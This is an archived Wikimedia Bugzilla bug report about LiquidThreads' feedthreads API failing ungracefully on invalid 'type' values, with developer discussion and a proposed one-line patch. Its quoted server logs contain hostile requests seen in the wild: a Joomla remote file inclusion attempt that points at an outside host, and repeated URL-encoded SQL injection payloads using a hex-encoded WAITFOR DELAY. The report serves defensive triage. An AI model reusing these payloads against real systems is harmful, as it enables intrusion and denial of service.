Last modified: 2014-09-23 07:24:24 UTC

Wikimedia Bugzilla is closed!

Wikimedia migrated from Bugzilla to Phabricator. Bug reports are handled in Wikimedia Phabricator.
This static website is read-only and for historical purposes. It is not possible to log in and except for displaying bug reports and their history, links might be broken. See T24510, the corresponding Phabricator task for complete and up-to-date bug report information.

Bug 22510 - Make invalid type parameter in ApiFeedLQTThreads fail more gracefully


Summary:	Make invalid type parameter in ApiFeedLQTThreads fail more gracefully

Status:	NEW

Product:	MediaWiki extensions
Classification:	Unclassified
Component:	LiquidThreads (Other open bugs)
Version:	unspecified
Hardware:	All All

Importance:	Normal normal (vote)
Target Milestone:	---
Assigned To:	Nobody - You can work on this!

URL:
Whiteboard:
Keywords:

Duplicates:	22915 (view as bug list)
Depends on:	39830
Blocks:	39480
	Show dependency tree / graph

Reported:	2010-02-13 16:21 UTC by Sam Reed (reedy)
Modified:	2014-09-23 07:24 UTC (History)
CC List:	11 users (show)

See Also:
Web browser:	---
Mobile Platform:	---
Assignee Huggle Beta Tester:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Description Sam Reed (reedy) 2010-02-13 16:21:34 UTC

Translatewiki has been having some hits meant for Joomla, attempting exploits..

/w/api.php?action=feedthreads&type=replie%20%E2%80%A6//includes/gacl_api.class.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt???: Exception: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item

http://pywiki.pastey.net/132939

ApiBase::dieDebug( __METHOD__, 'Invalid feed class/item' );

is used in the formatbase, meaning it fails quite ungracefully...

Comment 1 Roan Kattouw 2010-02-14 13:16:06 UTC

Without having looked at the code in detail, I'd be inclined to say this is feedthreads's fault for not providing FormatFeedWrapper with the data format it expects (it's quite strict there). ApiFeedWatchlist handles this more gracefully.

Of course FormatFeedWrapper's pedantic behavior should be documented.

Comment 2 Sam Reed (reedy) 2010-02-14 15:28:00 UTC

Hmm

Unfortunately we haven't got into the feedthreads code by that point...

Comment 3 Roan Kattouw 2010-02-14 16:18:07 UTC

Yes we have, we've already left it. FormatFeedWrapper expects certain things to be put in the result a certain way, and because that hasn't happened, it dies badly.

Comment 4 Sam Reed (reedy) 2010-02-19 00:56:04 UTC

Bugs not actually an invalid feed.

It's from the type not being correctly set... For some reason, I can't seem to get it to dieUsage if the types not set (or bad)

Comment 5 Sam Reed (reedy) 2010-02-19 01:36:22 UTC

type= doesn't use the default (as per the rest of the api)

if type != replies || newthreads then it barfs like the above..

Should be "handled" by the throw new MWException( "Unable to determine appropriate display type" ); on line 140 of ApiFeedLQTThreads.php, but it seems not to be, and it just carrys on.

Comment 6 Sam Reed (reedy) 2010-03-22 07:58:12 UTC

*** Bug 22915 has been marked as a duplicate of this bug. ***

Comment 7 Niklas Laxström 2012-01-13 08:46:04 UTC

This needs to be fixed! It's flooding our exception logs more and more.

2012-01-13 02:20:55  mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:20:55  mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item
[13-Jan-2012 02:20:55] PHP Fatal error:  Call to a member function getPerformedAction() on a non-object in /www/w/includes/OutputPage.php on line 2863
2012-01-13 02:20:57  mediawiki-bw_: /w/api.php?feedformat=atom&type=1%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:20:57  mediawiki-bw_: /w/api.php?feedformat=atom&type=1%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item
[13-Jan-2012 02:20:57] PHP Fatal error:  Call to a member function getPerformedAction() on a non-object in /www/w/includes/OutputPage.php on line 2863
2012-01-13 02:20:59  mediawiki-bw_: /w/api.php?feedformat=atom&type=1%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:20:59  mediawiki-bw_: /w/api.php?feedformat=atom&type=1%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item
[13-Jan-2012 02:20:59] PHP Fatal error:  Call to a member function getPerformedAction() on a non-object in /www/w/includes/OutputPage.php on line 2863
2012-01-13 02:21:01  mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:21:01  mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads   Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item

Comment 8 Alex Monk 2013-02-20 21:45:11 UTC

(In reply to comment #5)
> Should be "handled" by the throw new MWException( "Unable to determine
> appropriate display type" ); on line 140 of ApiFeedLQTThreads.php, but it
> seems
> not to be, and it just carrys on.

The exception is thrown, which seems to cause the problem.

This fixes the error, though I'm not sure it's the right fix (I'm not familiar with the feed modules):

- throw new MWException( "Unable to determine appropriate display type" );
+ $msg = 'lqt-feed-title-all';

Comment 9 Nemo 2014-09-23 07:24:24 UTC

(In reply to Sam Reed (reedy) from comment #0)
> Translatewiki has been having some hits meant for Joomla, attempting
> exploits..
> 
> /w/api.php?action=feedthreads&type=replie%20%E2%80%A6//includes/gacl_api.
> class.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt???:
> Exception: Internal error in ApiFormatFeedWrapper::execute: Invalid feed
> class/item

We've not seen these lately, meaning exploiters got smarter, but the URL would currently gives:

<api>
  <warnings>
    <feedthreads xml:space="preserve">Unrecognized value for parameter 'type': replie …//includes/gacl_api.class.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt???</feedthreads>
  </warnings>
  <error code="internal_api_error_MWException" info="Exception Caught: Unable to determine appropriate display type" xml:space="preserve">

#0 /www/translatewiki.net/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php(53): ApiFeedLQTThreads->createFeedTitle(Array)
#1 /www/translatewiki.net/w/includes/api/ApiMain.php(932): ApiFeedLQTThreads->execute()
#2 /www/translatewiki.net/w/includes/api/ApiMain.php(364): ApiMain->executeAction()
#3 /www/translatewiki.net/w/includes/api/ApiMain.php(335): ApiMain->executeActionWithErrorHandling()
#4 /www/translatewiki.net/w/api.php(85): ApiMain->execute()
#5 {main}

</error>
</api>

Note You need to log in before you can comment on or make changes to this bug.

Wikimedia Bugzilla is closed!

Search

Personal tools

Navigation

Links